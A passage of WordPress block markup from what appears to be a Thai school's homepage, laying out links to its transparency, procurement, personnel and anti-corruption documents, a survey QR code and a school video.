data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 